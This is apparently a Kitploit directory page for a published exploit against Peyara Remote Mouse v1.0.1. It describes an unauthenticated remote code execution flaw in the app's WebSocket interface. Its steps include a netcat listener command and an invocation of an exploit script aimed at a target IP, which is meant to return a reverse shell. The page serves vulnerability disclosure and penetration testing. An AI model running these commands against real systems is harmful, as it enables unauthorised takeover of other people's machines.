Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/capture0x/peyara
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubcapture0x/peyara

Peyara

Peyara Remote Mouse v1.0.1- Remote Code Execution (RCE)

View Repository
3453 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Exploit Title: Peyara Remote Mouse v1.0.1 - Remote Code Execution (RCE)

Date: 2025-05-30

Exploit Author: tmrswrr

Software Link: https://peyara-remote-mouse.vercel.app/

Platform: Windows

Version: v1.0.1

Download Tool
Tested on: Windows 10

Vulnerability Description

Peyara Remote Mouse v1.0.1 contains an unauthenticated remote code execution vulnerability in its WebSocket command interface (port 1313). The application fails to validate or sanitize simulated keyboard input commands received via WebSocket connections, allowing attackers to chain malicious keyboard events that execute arbitrary system commands. This vulnerability can be exploited remotely without authentication to gain full system compromise.

Steps:

  1. Install Vulnerable Application
    Download and install Peyara Remote Mouse on the target Windows system.

  2. Start Netcat Listener
    Open a terminal and execute:

    root@kitploit:~
    nc -nlvp 4444
    
  3. Execute Exploit Script

root@kitploit:~
python3 Peyara.py --target 192.168.1.107 --lhost 192.168.1.110 --lport 4444

  1. Html version exploit